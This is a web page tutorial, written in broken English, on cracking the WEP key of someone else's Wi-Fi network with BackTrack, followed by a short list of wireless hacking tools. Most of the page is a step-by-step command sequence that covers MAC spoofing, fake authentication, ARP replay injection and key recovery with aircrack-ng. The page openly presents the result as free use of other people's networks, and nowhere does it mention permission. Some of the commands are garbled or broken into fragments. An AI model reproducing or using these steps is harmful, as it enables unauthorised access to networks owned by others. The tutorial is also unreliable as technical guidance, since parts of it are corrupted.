top of page

 

Wi-Fi Network Hacking Using BacKTrack

 

This tutorial will explain wi-fi Hacking deeply that how to crack wep key using Backtrack its really awssom trick to hack wifi key below follow step and ready to use wifi free well good Luck !!

 

Step 1:-

 

First Download Backtrack  from the following link Go: http://www.remote-exploit.org/backtrack_download.html

 

Step 2:-

 

Burn the iso image on CD and boot your laptop from CD drive i think you are smart so just bootable it CD.

 

Step 3:-

 

Now well Select the third boot option (VESA/KDE).

 

Step 4:-

 

Once in BT3, click the tiny black box in the lower left corner to load up a  "Konsole" window well done.

 

Step 5:-

 

Type the following command Below ok

airmon-ng

Note down the interface name. In this example wifi0 ok got it.

 

Step 6:-

 

airmon-ng stop wifi0

 

Step 7:-

 

ifconfig wifi0 down

 

Step 8:-

 

macchanger --mac 00:11:22:33:44:66 wifi0

 

Step 9:-

 

airmon-ng start wifi0

 

Step 10:-

 

airodump-ng wifi0

 

This will start populating Wifi networks all data snippet. Press Ctrl + C to stop.

Now its time to Check the network with WEP encryption.

 

Notedown BSSID, CH and ESSID somewhere in notepad or paper Just write down well be carefully.

 

Note that if the same BSSID is available in the second part with STATION associated with it,

 

means you some one is accessing that network and our task will be little easier.If not than don’t worry we will still crack it.

 

Step 11:-

 

airodump-ng -c (channel) -w (file name)

 

Replace

 

(channel) with the CH which u had already n

(file name) with any name of your choice

(bssid) with the BSSID which u had already note

 

--bssid (bssid) wifi0

 

Note it Below ::

 

Leave this console as it is and start new konsole well be carefully

 

Step 12:-

 

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0

 

If you don’t get Association Successful message then keep on trying until you got success definetly well good.

 

Step 13:-

 

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0

 

Well if you don’t see ARP ACK Snippet and sent packets are not increasing or still 0 as constant than it means no 1 is accessing that network.

 

But don’t worry you go an optional step then again Leave this console as it is and start new ok got it

 

Step 14:-

 

aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF

 

konsole

 

message than keep on trying until it well you get success got an optional step

 

konsole

 

–b (bssid) –h 00:11:22:33:44:66 wfi0

 

Press y and enter quickly well Now Follow Below Step.

 

Now you will see that ARP and ACK packets in 2nd console are increasing fast well done now Keep this console as it is

and start 4th console now we are going well are you crazzy.

 

Step 15:-

 

aircrack-ng -b (bssid) (filename)-

 

Now Last one Just Just wait and watch Friends and Backtrack will do rest of the work.

 

Hurry we got the key yuahh Cool Enjoy.

 

Great Well Done !! Finish Task

 

WI-FI HACKING TOOLS BELOW JUST FOR YOU ENJOY

 

Today I am going to share with you some of my favorite wireless tools that can be used to hack Wi-Fi password you know about i think you are smart then me Focus on now well using Ubuntu or any other Linux distribution:

 

(1) Aircrack-ngAircrack-ng :

 

(a fork of aircrack tools) is my main tool for cracking Wi-Fi passwords. It has a wireless network detector, a packet sniffer, WEP and WPA/WPA2-PSK cracker, and an analysis tool for 802.11 wireless LANs. Aircrack-ng works with any wireless card whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic.

 

 

Download: http://www.aircrack-ng.org/

 

 

(2) Kismet :

 

 

Kismet is a really good network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. It will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. Kismet works in passive mode, which means it is capable of detecting the presence of both wireless access points and wireless clients without sending any log-gable packets.ismet – does a little more than just detecting networks. Aside from providing every detail about a network except the encryption key, Kismet is a packet sniffer and intrusion detection system.

 

Download: http://www.kismetwireless.net/

 

 

(3) NetStumblerNetwork :

 

This Windows based tool easily finds wireless signals being broadcast within range – A must have. It also has ability to determine Signal/Noise info that can be used for site surveys. I actually know of one highly known public wireless hotspot provider that uses this utility for their site surveys.

 

 

Download: http://www.netstumbler.com/downloads/

 

"Connect" and Feel Free with Cyber Defence Group for WhiteHat Hacking  because we believe in Security.

  • Facebook App Icon
  • Twitter App Icon
  • Google+ App Icon
  • LinkedIn App Icon
  • Pinterest App Icon
bottom of page